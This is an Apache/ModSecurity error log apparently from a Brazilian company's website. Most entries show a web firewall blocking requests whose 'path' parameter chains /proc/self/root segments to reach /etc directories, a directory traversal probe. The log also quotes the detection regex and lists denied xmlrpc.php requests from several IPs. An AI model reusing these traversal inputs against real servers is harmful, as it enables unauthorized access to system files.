https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:39:13.128269 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:43778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5D_u8EFLIOrSqIpsNEAAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:39:14.958041 2026] [mime_magic:error] [pid 11816:tid 140411607643904] (70014)End of file found: [client 216.73.216.191:22910] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:39:15.067379 2026] [:error] [pid 15051:tid 140411641214720] [client 74.7.243.128:43788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5EymAPhZkrhU8w4l2twAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:39:23.576595 2026] [mime_magic:error] [pid 17887:tid 140411716749056] (70014)End of file found: [client 74.7.241.31:34746] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/var
[Wed Mar 18 11:39:36.830810 2026] [access_compat:error] [pid 15051:tid 140411540502272] [client 195.123.216.134:35788] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:39:38.108714 2026] [access_compat:error] [pid 31803:tid 140411649607424] [client 185.220.101.60:17861] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:39:39.371250 2026] [access_compat:error] [pid 17653:tid 140411590858496] [client 45.80.158.75:20248] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:39:43.225714 2026] [access_compat:error] [pid 15826:tid 140411582465792] [client 84.239.12.30:13589] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:39:44.588434 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.243.128:43800] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5MOyqAr6etmhZHNrL8wAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:39:46.017884 2026] [:error] [pid 15051:tid 140411641214720] [client 74.7.243.128:48888] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5MimAPhZkrhU8w4l20gAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:39:49.487106 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:48896] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5Nfu8EFLIOrSqIpsNHgAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:39:55.630809 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.243.128:49684] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5O-w_le52K8_3pV3pPgAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:39:56.970888 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:49696] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5PNa6ubjKNq_cu4alJgAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:39:57.094133 2026] [access_compat:error] [pid 11816:tid 140411699963648] [client 109.70.100.6:42722] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:39:58.274966 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:49708] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5PtY0UrI5A3LftIy41QAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:40:00.099507 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:55198] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5P9Y0UrI5A3LftIy42QAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:40:02.460818 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:55212] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5Qvu8EFLIOrSqIpsNKAAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:40:02.784951 2026] [mime_magic:error] [pid 26799:tid 140411641214720] (70014)End of file found: [client 74.7.241.31:50344] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/lib/firmware
[Wed Mar 18 11:40:03.417222 2026] [mime_magic:error] [pid 15051:tid 140411649607424] (70014)End of file found: [client 57.141.18.116:55820] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:40:05.276840 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:55224] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5Rfu8EFLIOrSqIpsNKwAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:40:06.957186 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:55234] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5Rta6ubjKNq_cu4alMwAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:40:09.800877 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.243.128:55242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5SUzinOy1jxa1j4cfJAAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:40:11.523420 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:41452] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5S_u8EFLIOrSqIpsNLAAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:40:15.526489 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:41466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5T-yqAr6etmhZHNrMAAAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:40:20.640167 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.243.128:41476] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5VNY0UrI5A3LftIy47gAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:40:33.794894 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:42356] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5YQkwaGbbGflqUZAZggAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:40:35.099211 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:45648] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5Y_u8EFLIOrSqIpsNMwAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:40:35.595011 2026] [access_compat:error] [pid 31803:tid 140411733534464] [client 171.25.193.81:36852] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:40:36.442990 2026] [:error] [pid 15051:tid 140411733534464] [client 74.7.243.128:45658] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5ZCmAPhZkrhU8w4l29wAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
